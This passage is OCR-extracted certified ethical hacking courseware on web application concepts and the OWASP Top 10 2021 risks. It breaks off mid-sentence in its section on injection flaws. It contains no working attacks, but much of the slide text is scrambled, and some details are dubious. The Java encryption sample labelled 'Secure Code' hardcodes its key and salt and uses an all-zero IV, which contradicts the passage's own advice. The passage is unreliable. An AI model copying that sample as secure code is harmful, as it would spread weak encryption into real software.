This page is intentionally left blank.

Ethical Hacking and Co untermeasures Exam 312-50 Certified Ethical Hacker

Hacking Web Applications

- - - - - - - - - - - - - - - - - - LEARNING OBJECTIVES
e L0 #01: Summarize Web Application Concepts e L0#0 4: Explain Web API, Webhooks, and Web Shell

e L0# 02: Demonstrate Web App lication Threats e L0#05 : Summarize the Techniques used in Web
Application Security
e L0#03: Expla in Web Applicati on Hacking Methodology

Copyright Cl by EC.CIUICII All Rights Reserved Reproduction IS Strictly Proh1b1ted

Learning Objectives
The evolution of the Internet and web technologies, combined with rapidly increasing Internet
connectivity, has led to the emergence of a new business landscape. Web applications are an
integral component of online businesses. Everyone connected via the Internet is using various
web applications for different purposes, including online shopping, email, chats, and social
networking.
Web applications are becoming increasingly vulnerable to more sophisticated threats and
attack vectors. This module will familiarize you with various web applications and web attack
vectors as well as how to protect an organization's information resources from them. It
describes the general web application hacking methodology that most attackers use to exploit a
target system. Ethical hackers can use this methodology to assess their organization's security
against web application attacks. This module will also familiarize you with web API, webhooks,
and web shell concepts as well as hacking. In addition, it discu sses several tools that are useful
in different stages of web application security assessment.
At the end of this module, you will be able to:
■ Describe web application concepts
■ Perform various web application attacks
■ Describe the web application hacking methodology
■ Use different web application hacking tool s
■ Explain web API, webhooks, and web shell concepts
■ Understand how to hack web applications via web API, webhooks, and web shells

Module 14 Page 1881 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Right s Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Co untermeasures Exam 312-50 Certified Et hical Hacker
Hacking Web Applications

■ Adopt countermeasures against web application attacks

■ Use different web application security testing tools

Module 14 Page 1882 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Right s Reserved. Reproduction is Strictly Prohibited .
Ethical Hacking and Co untermeasures Exam 312-50 Certified Et hical Hacker
Hacking Web Applications

10#01: Summarize Web Application Concepts

. .~ - Copyright C by IC-CIIICII All Rights Reserved Reprod uction 1s Strictly Proh1b1ted

Web Application Concepts

This section describes the basic concepts associated with web applications vis-a-vis security
concerns-their components, how they work, their architecture, and so on. Furthermore, it
provides insights into web services and vulnerability stacks.

Module 14 Page 1883 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Right s Reserved. Reproduction is Strictly Prohibited .
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Web Applications

Introduction to Web Applications

Web applications provide an interface between end users and web servers through a set of web pages that are
generated at the server end or contain script code to be executed dynamically within the client web browser

Though web applications enforce certain security policies, they are vulnerable to various attacks such as SQL
injection, cross-site scripting, and session hijacking

· ··· · ·· · ······➔ -· ··················➔~········1

User Login Form Internet Firewall Web Server

HowWeb
Applications
Work
Operating System DBMS Web Application Server

ID Topic News
6329 Tech CNN
-<l·············'
SELECT • £ran n e ws whe r e id = 6329
Output

Copynght Cl by EC-Ctuncil All Rights Reseived Reproduction is Strictly Prohibited

Introduction to Web Applications

Web applications are software programs that run on web browsers and act as the interface
between users and web servers through web pages. They enable the users to request, submit,
and retrieve data to/from a database over the Internet by interacting through a user-friendly
graphical user interface {GUI). Users can input data via a keyboard, mouse, or touch interface
depending on the device they are using to access the web application. Based on browser-
supported programming languages such as JavaScript, HTML, and CSS, web applications work in
combination with other programming languages such as SQL to access data from the databases.
Web applications are developed as dynamic web pages, and they allow users to communicate
with servers using server-side scripts. They allow users to perform specific tasks such as
searching, sending emails, connecting with friends, online shopping, and tracking and tracing.
Furthermore, there are several desktop applications that provide users with the flexibility to
work with the Internet.
Entities develop various web applications to offer their services to users via the Internet.
Whenever users need to access such services, they can request them by submitting the
Uniform Resource Identifier {URI) or Uniform Resource Locator {URL) of the web application in
a browser. The browser passes this request to the server, which stores the web application data
and displays it in the browser. Some popular web servers are Microsoft IIS, Apache HTTP
Server, H20, LiteSpeed, Cherokee, etc.
Increasing Internet usage and expanding online businesses have accelerated the development
and ubiquity of web applications across the globe. A key factor in the adoption of web
applications for business purposes is the multitude of features that they offer. Moreover, they
are secure and relatively easy to develop. In addition, they offer better services than many
computer-based software applications and are easy to install, maintain, and update.

Module 14 Page 1884 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Web Applications

The advantages of web applications are listed below:

• As they are independent of the operating system, their development and
troubleshooting are easy and cost-effective.
• They are accessible anytime and anywhere using a computer with an Internet
connection.
• The user interface is customizable, making it easy to update.
• Users can access them on any device having an Internet browser, including PDAs,
smartphones, etc.
• Dedicated servers, monitored and managed by experienced server administrators, store
all the web application data, allowing developers to increase their workload capacity.
• Multiple locations of servers not only increase physical security but also reduce the
burden of monitoring thousands of desktops using the program.
■ They use flexible core technologies, such as JSP, Servlets, Active Server Pages, SQL
Server, .NET, and scripting languages, which are scalable and support even portable
platforms.
Although web applications enforce certain security policies, they are vulnerable to various
attacks such as SQL injection, cross-site scripting, and session hijacking.
How Web Applications Work

The main function of web applications is to fetch user-requested data from a database. When a
user clicks or enters a URL in a browser, the web application immediately displays the
requested website content in the browser.
This mechanism involves the following steps:
• First, the user enters the website name or URL in the browser. Then, the user's request
is sent to the web server.
• On receiving the request, the web server checks the file extension:
o If the user requests a simple web page with an HTM or HTML extension, the web
server processes the request and sends the file to the user's browser.
o If the user requests a web page with an extension that needs to be processed at the
server side, such as php, asp, and cfm, then the web application server must process
the request.
■ Therefore, the web server passes the user's request to the web application server,
which processes the user's request.
■ The web application server then accesses the database to perform the requested task
by updating or retrieving the information stored on it.
• After processing the request, the web application server finally sends the results to the
web server, which in turn sends the results to the user's browser.

Module 14 Page 1885 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is St rictly Prohibited .
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Web Applications

User
. - - - - - - - . http://certifledhacker.com
uw~me /?id=6329&print=Y
. ...._. lt ...... . .. . . . . .. .. . ... . . ~

Login Form Internet

·············~
Firewall
-
-:-t ··················
Web Server

• .....................?.~:.".'.'.'.~~.'.~~............... e" a". . . . . . . . I~@. . . .

Operating System DBMS Web Application Server

....
ID Topic News
6329 Tech CNN <············=
SELECT* from news where id= 6329
Output

Figure 14.1: Working of web applications

Web Application Architecture

Web applications run on web browsers and use a set of server-side scripts (Java, C#, Ruby, PHP,
etc.) and client-side scripts (HTML, JavaScript, etc.) to execute the application. The working of
the web application depends on its architecture, which includes hardware and software that
perform tasks such as reading the request as well as searching, gathering, and displaying the
required data.
The web application architecture includes different devices, web browsers, and external web
services that work with different scripting languages to execute the web application. It consists
of three layers:
1. Client or presentation layer

2. Business logic layer

3. Database layer
The client or presentation layer includes all physical devices present on the client side, such as
laptops, smartphones, and computers. These devices feature operating systems and compatible
browsers, which enable users to send requests for required web applications. The user requests
a website by entering a URL in the browser, and the request travels to the web server. The web
server then responds to the request and fetches the requested data; the application finally
displays this response in the browser in the form of a web page.
The "business logic" layer itself consists of two layers: the web-server logic layer and the
business logic layer. The web-server logic layer contains various components such as a firewall,
an HTTP request parser, a proxy caching server, an authentication and login handler, a resource
handler, and a hardware component, e.g., a server. The firewall offers security to the content,
the HTTP request parser handles requests coming from clients and forwards responses to them,
and the resource handler is capable of handling multiple requests simultaneously. The web-
server logic layer contains code that reads data from the browser and returns the results (e.g.,
IIS Web Server, Apache Web Server).

Module 14 Page 1886 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited .
Ethical Hacking and Co untermeasures Exam 312-50 Cert ified Et hical Hacker
Hacking Web Applications

The business logic layer includes the functional logic of the web application, which is
implemented using technologies such as .NET, Java, and "middleware". It defines the flow of
data, according to which the developer builds the application using programming languages. It
stores the application data and integrates legacy applications with the latest functionality of the
application. The server needs a specific protocol to access user-requested data from its
database. This layer conta ins the software and defines the steps to search and fetch the data.
The database layer consists of cloud services, a B2B layer that holds all the commercial
transactions, and a database server that supplies an organization's production data in a
structured form (e.g., MS SQL Server, MySQL server).

Business Layer

Web Browser
Application Server
Presentation
Layer
Java C# Ruby
HTML, CSS, Business
Smart Phones, JavaScript logic
PHP Python JavaScript
Web Appliance

Legacy Application

Dat a Access
Web Server

Prese ntation Layer

Firewall Database Layer ...__ _....z;_ _ _ _ __

Proxy Server,
HTTP Request Parser Cache

Servlet Resource Database Server

Container Handler and Login

Figure 14.2: Web Applicat ion Archit ecture

Module 14 Page 1887 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Right s Reserved . Reproduction is Strictly Prohibited .
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Web Applications

Web Services

A web service is an application or software that is deployed over the Internet and uses standard messaging protocols
such as SOAP, UDDI, WSDL, and RESTto enable communication between applications developed for different
platforms

Types ofWeb Services Web Service Architecture

SOAP web services

e It is based on the XML format and is

used to transfer data betwee n a service
provider and requestor

RESTful web services

e It is based on a set of constraints using

underlying HTTP concepts to improve
performa nee Service Service Provider
Requester (Contains Service and
Service Descriptions)

Copynght Cl by EC-Ctuncil All Rights Reseived Reproduction is Strictly Prohibited

Web Services
A web service is an application or software that is deployed over the Internet. It uses a standard
messaging protocol (such as SOAP) to enable communication between applications developed
on different platforms. For instance, Java-based services can interact with PHP applications.
These web-based applications are integrated with SOAP, UDDI, WSDL, and REST across the
network.
Web Service Architecture

A web service architecture describes the interactions among the service provider, service
requester, and service registry. These interactions consist of three operations, namely publish,
find, and bind. All these roles and operations work together on web service artifacts known as
software modules (services) and their descriptions.
Service providers offer web services. They deploy and publish service descriptions of a web
service to a service registry. Requesters find these descriptions from the service registry and
use them to bind with the web service provider and invoke the web service implementation.
There are three roles in a web service:
• Service Provider: It is a platform from where services are provided.

■ Service Requester: It is an application or client that is seeking a service or trying to

establish communication with a service. In general, the browser is a requester, which
invokes the service on behalf of a user.
• Service Registry: It is the place where the provider loads service descriptions. The
service requester discovers the service and retrieves binding data from the service
descriptions.

Module 14 Page 1888 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved . Reproduction is Strictly Prohibited .
Ethical Hacking and Co untermeasures Exam 312-50 Certified Et hical Hacker
Hacking Web Applications

There are three operations in a web service architecture:

• Publish: During this operation, service descriptions are published to allow the requester
to discover the services.
• Find: During this operation, the requester tries to obtain the service descriptions. This
operation can be processed in two different phases: obtaining the service interface
description at development time and obtain the binding and location description calls at
run time.
■ Bind: During this operation, the requester calls and establishes communication with the
services during run time, using binding data inside the service descriptions to locate and
invoke the services.
There are two artifacts in a web service architecture:
■ Service: It is a software module offered by the service provider over the Internet. It
communicates with the requesters. At times, it can also serve as a requester, invoking
other services in its implementation.
■ Service Description: It provides interface details and service implementation details. It
consists of all the operations, network locations, binding details, datatypes, etc. It can
be stored in a registry and invoked by the requester .

•
.J ta¥
~·····················································> 6
■ Bind ♦c,,,
Service Service Provider
Requester (Contains Service and
Service Descriptions)

Figure 14.3: We b Service Architecture

Characteristics of Web Services

• XML-based : Web services use XML for data representation and transportation. XML
usage can avoid OS, networking, or platform binding. Applications that provide web
services are highly interoperable.
• Coarse-grained service: In web services, some objects contain a massive amount of
information and offer greater functionality th an fine-grained services. A coarse-grained
service is a combination of multiple fine-grained services.

Module 14 Page 1889 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Right s Reserved. Reproduction is Strictly Prohibit ed.
Ethical Hacking and Co untermeasures Exam 312-50 Certified Et hical Hacker
Hacking Web Applications

■ Loosely coupled: Web services support a loosely coupled approach for interconnecting
systems. The interaction between the systems can occur via the web API by sending
XML messages. The web API incorporates a layer of abstraction for the infrastructure to
make the connection flexible and adaptable.
■ Asynchronous and synchronous support: Synchronous services are called by users who
wait for a response, whereas asynchronous services are called by users who do not wait
for a response. RPC-based messages and document-based messages are often used for
synchronous and asynchronous web services. Synchronous and asynchronous
endpoints are implemented using servlets, SOAP/XML, and HTTP.
■ RPC support: Web services support remote procedure calls (RPC) similarly to traditional
applications.
Types of Web Services

Web services are of two types:

■ SOAP web services

The Simple Object Access Protocol (SOAP) defines the XML format. XML is used to
transfer data between the service provider and the requester. It also determines the
procedure to build web services and enables data exchange between different
programming languages.
■ RESTful web services

REpresentational State Transfer (RESTful) web services are designed to make the
services more productive. They use many underlying HTTP concepts to define the
services. It is an architectural approach rather than a protocol like SOAP.
Components of Web Service Architecture:

■ UDDI : Universal Description, Discovery, and Integration (UDDI) is a directory service that
lists all the services available.
■ WSDL: Web Services Description Language is an XML-based language that describes and
traces web services.
■ WS-Security: Web Services Security (WS-Security) plays an important role in securing
web services. It is an extension of SOAP and aims to maintain the integrity and
confidentiality of SOAP messages as well as to authenticate users.
There are other important features/components of the web service architecture, such as WS-
Work Processes, WS-Policy, and WS Security Policy, which play an important role in
communication between applications.

Module 14 Page 1890 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Right s Reserved. Reproduction is Strictly Prohibited .
Ethical Hacking and Co untermeasures Exam 312-50 Certified Ethical Hacker
Hacking Web Applications

Vulnerability Stack

Custom Web Appllcatlons

Third-party Components

Web Server
~ Layer 7

Layer6

Layer 5
• I
Apache
Business Logic Flaws
Technical Vulnerabilities

Open Source/ Commercial

Apache/ Microsoft IIS

Database Layer4 ~ Oracle/ MySQL / MS SQL

Operating System Layer 3 8 Windows/ Linux/ macOS

Network Router/ Switch

Layer 2

Security
Layer 1
~ IPS/ IDS

Copynght Cl by EC-Ctuncil All Rights Reseived Reproduction is Strictly Prohibited

Vulnerability Stack
One maintains and accesses web applications through various levels that include custom web
applications, third-party components, databases, web servers, operating systems, networks,
and security. All the mechanisms or services employed at each layer enable the user to access
the web application securely. When considering web applications, the organization considers
security as a critical component because web applications are major sources of attacks. The
vulnerability stack shows various layers and the corresponding elements/mechanisms/services
that make web applications vulnerable.

Custom Web Applications

Third-party Components
1£~
-.
Layer 7

Laye r 6 • ~
Business Logic Flaws
Technical Vulnerabilities

Open Source/ Commer cial

Web Server

Dat abase
-
'Fi
~
Laye r 5

Layer 4
I
Apache

~
Apache / Microsoft IIS

Oracle / MySQL / MS SQL

Operating System Layer 3 8 Windows / Linux/ macOS

Network Router / Switch

Layer 2 am:!

Security [!:q IPS/ IDS

Layer 1

Figu re 14.4: Vulnerability St ack

Module 14 Page 1891 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Right s Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Web Applications

Attackers exploit the vulnerabilities of one or more elements among the seven levels to gain
unrestricted access to an application or the entire network.
■ Layer 7

If an attacker finds vulnerabilities in the business logic (implemented using languages

such as .NET and Java), he/she can exploit these vulnerabilities by performing input
validation attacks such as XSS.
■ Layer 6

Third-party components are services that integrate with the website to achieve certain
functionality (e.g., Amazon.com targeted by an attacker is the main website; citrix.com
is a third-party website).
When customers choose a product to buy, they click on the Buy/Checkout button. This
redirects them to their online banking account through a payment gateway. Third-party
websites such as citrix.com offer such payment gateways. Attackers might exploit such
redirection and use it as a medium/pathway to enter Amazon.com and exploit it.
■ Layer 5

Web servers are software programs that host websites. When users access a website,
they send a URL request to the web server. The server parses this request and responds
with a web page that appears in the browser. Attackers can perform footprinting on a
web server that hosts the target website and grab banners that contain information
such as the web server name and its version. They can also use tools such as Nmap to
gather such information. Then, they might start searching for published vulnerabilities in
the CVE database for that particular web server or service version number and exploit
any that they find.
■ Layer 4

Databases store sensitive user information such as user IDs, passwords, phone numbers,
and other particulars. There could be vulnerabilities in the database of the target
website. These vulnerabilities can be exploited by attackers using tools such as sqlmap
to gain control of the target's database.
■ Layer 3

Attackers scan an operating system to find open ports and vulnerabilities, and they
develop viruses/backdoors to exploit them . They send malware through the open ports
to the target machine; by running such malware, they can compromise the machine and
gain control over it. Later, they try to access the databases of the target website.
■ Layer 2

Routers/switches route network traffic only to specific machines. Attackers flood these
switches with numerous requests that exhaust the CAM table, causing it to behave like a
hub. Then, they focus on the target website by sniffing data (in the network), which can
include credentials or other personal information.

Module 14 Page 1892 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is St rictly Prohibited .
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Web Applications

■ Layer 1

IDS and IPS raise alarms if any malicious traffic enters a target machine or server.
Attackers adopt evasion techniques to circumvent such systems so that they do not
trigger any alarm while exploiting the target.

Module 14 Page 1893 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited .
Ethical Hacking and Co untermeasures Exam 312-50 Certified Et hical Hacker
Hacking Web Applications

10#02: Demonstrate Web Application Threats

· ~ - Copyright C by IC-CIIICII All Rights Reserved Reprod uction 1s Strictly Proh1b1ted

Web Application Threats

Attackers attempt various application-level attacks to compromise the security of web
applications to commit fraud or steal sensitive information. This section discusses the various
types of threats and attacks against the vulnerabilities of web applications.

Module 14 Page 1894 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Right s Reserved. Reproduction is Strictly Prohibited .
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Web Applications

OWASP Top 10 Application Security Risks - 2021

Vulnerable and Outdated

AOl Broken Access Control A06 Components

Identification and Authentication

A02 Cryptographic Failures A07 Failures

Software and Data Integrity

A03 Injection A08 Failures

Security Logging and Monitoring

A04 Insecure Design A09 Failures

Server-Side Request Forgery

AOS Security Misconfiguration AlO (SSRF)
https://owosp.org
Copynght Cl by EC-Ctuncil All Rights Reseived Reproduction is Strictly Prohibited

OWASP Top 10 Application Security Risks-2021

Source: https://owasp.org
OWASP is an international organization that maintains a list of the top 10 vulnerabilities and
flaws of web applications. The latest OWASP top 10 application security risks are as follows.
• AOl - Broken Access Control

This vulnerability is related to improperly enforced restrictions on the actions of

authenticated users. Attackers can exploit these flaws to access unauthorized
functionality and/or data such as access to other user accounts, viewing of sensitive
files, modifications to other user data, and changes to access rights.
• A02 - Cryptographic Failures

Many web applications and APls do not properly protect sensitive data, such as financial
data, healthcare data, and personally identifiable information (PII). Moreover, many
application developers fail to implement strong cryptographic keys, use old keys, or fail
to enforce proper key management. In such cases, sensitive data can be transmitted in
cleartext through HTTP. Attackers can leverage this flaw to steal or modify such weakly
protected data to perform credit-card fraud, identity theft, or other crimes. Sensitive
data require extra protection such as encryption at rest or in transit, as well as special
precautions when exchanged with a browser.
• A03 - Injection

Injection flaws, such as SQL command injection and LDAP injection, occur when
untrusted data are sent to an interpreter as part of a command or query. The attacker's

Module 14 Page 1895 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is St rictly Prohibited .
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Web Applications

hostile data can trick the interpreter into executing unintended commands or accessing
data without proper authorization.
■ A04- Insecure Design

During application development, if security controls are not properly implemented

considering the latest business risks, various design flaws may occur. These design flaws
can compromise the integrity, confidentiality, and authenticity of data. Attackers can
exploit these flaws to perform session hijacking, credential theft, spoofing, and other
types of M ITM attacks.
■ A0S - Security Misconfiguration

Security misconfiguration is the most common issue in web security, which is due in part
to manual or ad hoc configuration (or no configuration at all); insecure default
configurations; open 53 buckets; misconfigured HTTP headers; error messages
containing sensitive information; and failure to patch or upgrade systems, frameworks,
dependencies, and components in a timely manner (or at all).
Many older or poorly configured XML processors evaluate external entity references
within XML documents. External entities can disclose internal files using the file URI
handler, internal 5MB file shares on unpatched Windows servers, internal port scanning,
remote code execution, or Dos attacks such as the billion laughs attack.
■ A06 - Vulnerable and Outdated Components

Components such as libraries, frameworks, and other software modules run with the
same privileges as the application. The software components need to be updated or
patched in a timely manner based on the current risks, failing which they can leave
serious vulnerabilities as they become outdated . An attack exploiting a vulnerable
component can cause serious data loss or server takeover. Applications and APls using
components with known vulnerabilities may undermine application defenses and
enable various attacks and impacts.
■ A07 - Identification and Authentication Failures

Application functions related to identification, authentication and session management

are often implemented incorrectly, allowing attackers to launch brute-forcing, password
spraying, and other automated attacks to compromise passwords, keys, or session
tokens or to exploit other implementation flaws to assume the identities of other users
(temporarily or permanently) .
■ A0S- Software and Data Integrity Failures

Many applications are implemented with auto-update features. Such applications may
download updates from unauthorized or previously trusted sources without conducting
sufficient integrity checks. Attackers can take advantage of this flaw and load their own
updates to distribute malware. Moreover, if data are encoded or serialized into an easily
understandable format, attackers can alter the data, leading to an insecure
deserialization flaw.

Module 14 Page 1896 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited .
Ethical Hacking and Co untermeasures Exam 312-50 Certified Et hical Hacker
Hacking Web Applications

■ A09 - Security Logging and Monitoring Failures

Security logging and monitoring failures occur via insufficient log monitoring, the local
storage of logs, inadequate error messages, inappropriate alert mechanisms for failed-
login attempts, or applications failing to identify threats in advance. Such vulnerabilities
can leak sensitive information that can be leveraged by the attackers to compromise a
system or account, tamper with credentials, or destroy data.
■ A10 - Server-Side Request Forgery (SSRF)
Server-Side Request Forgery (SSRF) is a web security vulnerability that arises when
remote resources are obtained by an application without verifying the URL entered by
the user. Attackers leverage this vulnerability to abuse the functionalities of a server to
read or modify internal resources and steal sensitive information by sending malicious
requests. SSRF vulnerabilities also allow attackers to send malicious requests to internal
systems, even if they are secured by firewalls ..

Module 14 Page 1897 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibit ed.
Ethical Hacking and Co untermeasures Exam 312-50 Cert ified Et hical Hacker
Hacking Web Applications

AO 1 - Broken Access Control

Access control refe rs to how a web application grants access t o its content and functions for some privileged users and restricts

J
others
Broken access control is a method in which an attacker identifies a f law related to access control and bypasses the aut hentication,
which allows t hem to compromise the network
It allows an attacker to act as users or administrators with privi leged f unct ions and create, access, update or delete every record
j
= iii t~■ --- -- I '. bl
0

Access Granted
Request
• ...~~.~~·'-'··:> - ·············,>
Privileged users -
Access Control
Web Application

Access Denied

r- Copynght CJ by iC-C1uncil All Rights Reserved Reproduction IS Stnctly Proh1b1ted

AO 1 - Broken Access Control

Access control refers to how a web application grants access to create, update, and delete any
record/content or function to some privileged users while restricting access to other users.
Broken access control is a method by which an attacker identifies a flaw related to access
control, bypasses the authentication, and then compromises the network. Access control
weaknesses are common because of the lack of automated detection and effective functional
testing by application developers. They allow attackers to act as users or administrators with
privileged functions and create, access, update, or delete any record.
According to OWASP 2021 R3 revision, the common vulnerabilities associated with access
control are as follows:
■ Abusing the least privileges or denying it by default, where everyone gains access to the
roles, users, or abilities instead of having specific accessibility.
■ Evading the filtering of access controls by changing the URL, API request, an HTML page,
or the application state via parameter tampering, force browsing, or any attacking tool .
■ Gaining permission to read or modify someone' s account through th eir unique
identifier.
■ Gaining access to the APls without the access controls for PUT, POST, and DELETE.
■ Escalating privileges, where a user can act as an administrator after logging in.
■ M anipulating the metadata; for example, the manipulat ion of a hidden field or
alteration of a JSON Web Token {JWT) access-control token or a cookie for exploiting
JWT invalidation or elevating privileges.

Module 14 Page 1898 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Right s Reserved. Reproduction is Strictly Prohibit ed.
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Web Applications

■ Accessing API via illegitimate sources exploiting cross-origin resource sharing (CORS)
misconfiguration .
■ Force browsing to privileged or authentic pages as a valid or an invalid user,
respectively.

- ') , .
- I

•.
_ ,,"
0 ~~~~~~'. .;:,.
Access Granted
-
Privileged users

Access Control
Web Application

Access Denied

Figure 14.5: Broken access-control attack

Module 14 Page 1899 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibit ed.
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Web Applications

A02 - Cryptographic Failures/Sensitive Data Exposure

Many web applications do not properly protect their sensitive Secure Code
data from unauthorized users
priva te static S tring sKey = " zoooooooooomt ! ! '";

Sensitive data exposure occurs due to flaws like insecure private static String salt • "ooohhhhhhhhhhh! ! ! ! " ;
cryptographic storage and information leakage public s t atic String a ncrypt(String plainTaxt) {

byte[] iv= ( 0, 0, 0, O, O, O, O, 0 , 0, 0, 0 , 0, 0, O, 0, 0 );
When an application uses poorly written encryption code to
I v ParamaterSpec ivspec • new IvParametarSpac.(iv);
securely encrypt and store sensitive data in the database, an
attacker can exploit this flaw and steal or modify weakly Sacre t.KayFactory f a ctory • new
SacratKayFact ory. geUns tanca ( "PBKDF2WithHmac.SHA256" } ;
protected sensitive data such as credit cards numbers, SSNs,
KeySpac = naw PBEKaySpac(sKay.toChai::Array() , salt . gatByt.a s{ ) ,
and other authentication credentials 65536 , 2 56) ;

Secret.Kay kay = factory.ganarataSecret(kayspac);

SecretKeySpec seeretKey = new secretKaySpec(key.gatEnooded{),
Vulnerable Code " AES");

public String encrypt (String plainText) { Cipher= Cipher. geUnstanoe("AES/CBC/PKCSSPadding");

ciphar.init(Cipha r.ENCRYPT_M:>DE , secratKay, ivspec) ;

plainText = plain Text.replace ("a" ,"z ");
byte[] utf8taxt = p1ainTa xt.g a tBytas ( " UTF-8 " );
pl.a inText = plainText.replace ("b" ,"y") ;
byte [ J enrypt adl'axt = cipher. doFinal. ( ut£8 text) ;
return Basa64Encodar. encodaToString (ancryptadTaxt) ; )
return Base64Encoder.encode (plainText) ; }

Copynght Cl by EC-Ctuncil All Rights Rese ive d Reproduction is Strictly Prohibite d

A02 - Cryptographic Failures/Sensitive Data Exposure

Web applications need to store sensitive information such as passwords, credit-card numbers,
account records, and other authentication information in a database or on a file system. If users
do not maintain the proper security of their storage locations, the application may be at risk as
attackers can access the storage and misuse the information.
Many web applications do not properly protect their sensitive data from unauthorized users.
Web applications use cryptographic algorithms to encrypt data and other sensitive information
that they need to transfer from the server to the client or vice versa. Sensitive data exposure
occurs because of flaws such as insecure cryptographic storage and information leakage.
Although the data are encrypted, some cryptographic encryption methods have inherent
weaknesses that allow attackers to exploit and steal the data. When an application uses poorly
written encryption code to encrypt and store sensitive data in a database, the attacker can
easily exploit this flaw to steal or modify weakly protected sensitive data such as credit-cards
numbers, SSNs, and other authentication credentials. Thus, they can launch further attacks
such as identity theft and credit-card fraud.
Developers can avoid such attacks using algorithms to encrypt sensitive data. At the same time,
developers must take precautions to store cryptographic keys securely. If these keys are stored
at insecure locations, then attackers can retrieve them easily and decrypt the sensitive data.
The insecure storage of keys, certificates, and passwords also allows the attacker to gain access
to the web application as a legitimate user. Furthermore, developers must check the
randomness of the initialization vectors (IVs) used in the encryption algorithms. Developers
should ensure that the IVs are not reused and are generated using secure cipher modes of
operation. Moreover, developers must avoid using deprecated hash functions such as MDS and
SHA-1 and deprecated padding methods such as PKCS 1/1.5. Cryptographic failures can cause

Module 14 Page 1900 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Co untermeasures Exam 312-50 Certified Et hical Hacker
Hacking Web Applications

severe losses to a company. Hence, organizations must protect all their resources such as
systems or other network resources from information leakage by employing proper content-
filtering mechanisms. Additionally, organizations should ensure that cryptographic error
messages and side-channel information do not leave any clue for exploitation.
The screenshots below show poorly encrypted vulnerable code and secure code that is properly
encrypted using a secure cryptographic algorithm, respectively.

Vulnerable Code
public String encrypt(String plainText) {

plainText = plainText . replace( " a "," z " ) ;

plainText = plainText . replace( "b ", " y " ) ;

return Base64Encoder . enc ode(plainText) ; }

Figure 14.6: Vulnerable code example

Secure Code
p r i v ate static Strin g sKey = " z oooooooooom !! !! 11
;

p r ivate s tatic String sal t= " ooohhhhhh hhhh h!! !! " ;

p ublic stati c Stri ng encrypt (Stri n g plainText) (

b y te [] i v = ( 0 , 0 , 0, 0, 0 , 0, 0 , 0 , 0 , 0 , 0 , 0 , 0 , 0 , 0, 0 } ;

IvParame t e r Sp e c ivspec = new I v ParameterSp ec (iv) ;

Se c retKeyFact o ry f ac t ory = n ew
SecretKe yFactory .getl nsta nce ( " PBKDF2WithHmacSHA256" ) ;

KeySp ec = new PBEKeySpec(sKe y. t oCharArray () , sal t.getBy t es () ,

65536 , 256 ) ;

SecretKey ke y = facto ry .generateSecret (ke y Sp ec) ;

SecretKeySpec s ecretKey = new Secret KeySpec (ke y . g etEncoded () ,

11 AES 11 ) ;

Cip her= Ci p he r . ge t l n s t ance ( " AES/CBC/PKCS5Pa dding " ) ;

c ipher . init (Ciph er . ENCRYPT_MODE , sec retKey , ivs pec ) ;

b y te [] utfBte x t = pla i n Te xt . getBytes (" UTF-8 " ) ;

byte [] enryptedTe x t = c i pher . doFinal(utfBtext ) ;

retu r n Base64Encoder . encodeToString (enc ryptedText ) ; }

Figure 14.7: Secure code example

Module 14 Page 1901 Ethical Hacking and Countermeasures Copyright © by EC-Council

All Right s Reserved. Reproduction is Strictly Prohibit ed.
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Web Applications

A03 - Injection Flaws

Injection flaws are web application vulnerabilities that allow untrusted data to be interpreted and executed as
part of a command or query

Attackers exploit injection flaws by constructing malicious commands or queries that result in data loss or
corruption, lack of accountability, or denial of access

Injection flaws are prevalent in legacy code, often found in SQL, LDAP, XPath queries, and so on and can be easily
discovered by application vulnerability scanners and fuzzers

SQL
Injection
It involves the injection of malicious SQL queries into user input forms tw

Command It involves the injection of malicious code through a web application

Injection

LDAP
It involves the injection of malicious LDAP statements
Injection

Cross-Site
Scripting (XXS)
It involves the injection and execution of malicious scripts in the web browser fj.
r- Copynght CJ by iC-C1uncil All Rights Reserved Reproduction IS Stnctly Proh1b1ted

A03 - Injection Flaws

Injection flaws are web application vulnerabilities that allow untrusted data to be interpreted
and executed as part of a command or query. Attackers exploit injection flaws by constructing
malicious commands or queries that result in data loss or corruption, lack of accountability, or
